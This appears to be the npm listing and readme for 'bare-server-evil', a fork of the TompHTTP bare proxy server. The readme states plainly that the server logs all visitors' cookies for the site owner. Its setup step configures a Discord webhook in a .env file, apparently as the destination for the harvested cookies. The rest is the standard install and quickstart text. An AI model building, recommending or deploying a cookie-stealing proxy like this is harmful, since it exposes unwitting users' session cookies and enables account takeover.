bare-server-evil
v2.0.1
Published
The Bare Server implementation in NodeJS.
Readme
Evil TOMP Bare Server
This repository implements the TompHTTP bare server. See the specification here.
This also logs all your cookies for the site owner.
Extra Setup
Make a .env file that looks like this:
WEBHOOK="https://discord.com/api/webhooks/10/T0k3n"Upgrading
A guide for updating from v1 to v2 can be found here.
Usage
We provide a command-line interface for creating a server.
For more features, specify the --help option when running the CLI.
Quickstart
- Install Bare Server Node globally
npm install --global @tomphttp/bare-server-node- Start the server
npx bare-server-nodeOptionally start the server localhost:8080:
npx bare-server-node --port 8080 --host localhostProgramically create a bare server
See examples/.
Development
See the wiki.
